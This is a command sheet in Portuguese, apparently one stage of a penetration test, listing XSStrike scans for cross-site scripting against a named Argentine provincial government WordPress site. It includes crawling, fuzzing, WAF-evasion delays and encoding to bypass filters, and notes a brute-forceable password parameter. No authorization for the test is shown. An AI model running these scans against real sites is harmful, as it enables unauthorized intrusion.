# ============================================
# ETAPA 18: CROSS-SITE SCRIPTING (XSS) TESTING
# Comandos XSStrike para executar manualmente
# ============================================
# Ferramenta: XSStrike v3.1.5 (Python)
# Localização: /c/Sec/Tools/XSStrike/xsstrike.py
# Alvo: https://desarrolloyempleo.cba.gov.ar

# ============================================
# COMANDOS BÁSICOS (RECOMENDADOS)
# ============================================

# Comando 1: Testar URL específica com parâmetros (RECOMENDADO PARA INICIAR)
python /c/Sec/Tools/XSStrike/xsstrike.py -u "https://desarrolloyempleo.cba.gov.ar/wp-json/wp/v2/posts/106992?password=test" --crawl

# Comando 2: Testar endpoint WordPress REST API com parâmetro context
python /c/Sec/Tools/XSStrike/xsstrike.py -u "https://desarrolloyempleo.cba.gov.ar/wp-json/wp/v2/posts/106992?context=view" --crawl

# Comando 3: Testar endpoint com parâmetro page_id
python /c/Sec/Tools/XSStrike/xsstrike.py -u "https://desarrolloyempleo.cba.gov.ar/?page_id=1" --crawl

# Comando 4: Testar endpoint oembed (já identificado com parâmetros)
python /c/Sec/Tools/XSStrike/xsstrike.py -u "https://desarrolloyempleo.cba.gov.ar/wp-json/oembed/1.0/embed?url=https://example.com&format=json" --crawl

# ============================================
# COMANDOS COM OPÇÕES AVANÇADAS
# ============================================

# Comando 5: Testar com fuzzer (testa múltiplos payloads)
python /c/Sec/Tools/XSStrike/xsstrike.py -u "https://desarrolloyempleo.cba.gov.ar/wp-json/wp/v2/posts/106992?context=view" --fuzzer

# Comando 6: Testar com delay (evitar bloqueio do WAF)
python /c/Sec/Tools/XSStrike/xsstrike.py -u "https://desarrolloyempleo.cba.gov.ar/wp-json/wp/v2/posts/106992?password=test" --delay 2 --crawl

# Comando 7: Testar com encoding (bypass de filtros)
python /c/Sec/Tools/XSStrike/xsstrike.py -u "https://desarrolloyempleo.cba.gov.ar/wp-json/wp/v2/posts/106992?context=view" -e base64 --crawl

# Comando 8: Testar com múltiplas threads (mais rápido)
python /c/Sec/Tools/XSStrike/xsstrike.py -u "https://desarrolloyempleo.cba.gov.ar/wp-json/wp/v2/posts/106992?password=test" -t 10 --crawl

# Comando 9: Testar endpoint base com crawl (descobre URLs automaticamente)
python /c/Sec/Tools/XSStrike/xsstrike.py -u "https://desarrolloyempleo.cba.gov.ar" --crawl

# Comando 10: Testar com arquivo de URLs (usar URLs descobertas na Etapa 11)
python /c/Sec/Tools/XSStrike/xsstrike.py -f ../reports/paramspider_urls_with_params.txt --crawl

# ============================================
# COMANDOS COM OUTPUT EM ARQUIVO
# ============================================

# Comando 11: Testar e salvar output em arquivo (COM TEE - VER PROGRESSO)
python /c/Sec/Tools/XSStrike/xsstrike.py -u "https://desarrolloyempleo.cba.gov.ar/wp-json/wp/v2/posts/106992?password=test" --crawl 2>&1 | tee etapa18_xss_password.txt

# Comando 12: Testar com fuzzer e salvar output
python /c/Sec/Tools/XSStrike/xsstrike.py -u "https://desarrolloyempleo.cba.gov.ar/wp-json/wp/v2/posts/106992?context=view" --fuzzer 2>&1 | tee etapa18_xss_context_fuzzer.txt

# Comando 13: Testar endpoint base com crawl e salvar
python /c/Sec/Tools/XSStrike/xsstrike.py -u "https://desarrolloyempleo.cba.gov.ar" --crawl 2>&1 | tee etapa18_xss_crawl.txt

# ============================================
# COMANDO RECOMENDADO PARA INICIAR:
# ============================================
python /c/Sec/Tools/XSStrike/xsstrike.py -u "https://desarrolloyempleo.cba.gov.ar/wp-json/wp/v2/posts/106992?password=test" --crawl 2>&1 | tee etapa18_xss_password.txt

# ============================================
# NOTAS:
# ============================================
# - Use 'tee' para ver progresso no terminal E salvar no arquivo
# - O XSStrike pode demorar vários minutos para completar
# - Se houver bloqueio do WAF, use --delay
# - O parâmetro 'context' já foi identificado como funcional
# - O parâmetro 'password' permite brute-force (DE-009)
# - Testar especialmente parâmetros que retornam conteúdo HTML/JSON
# ============================================
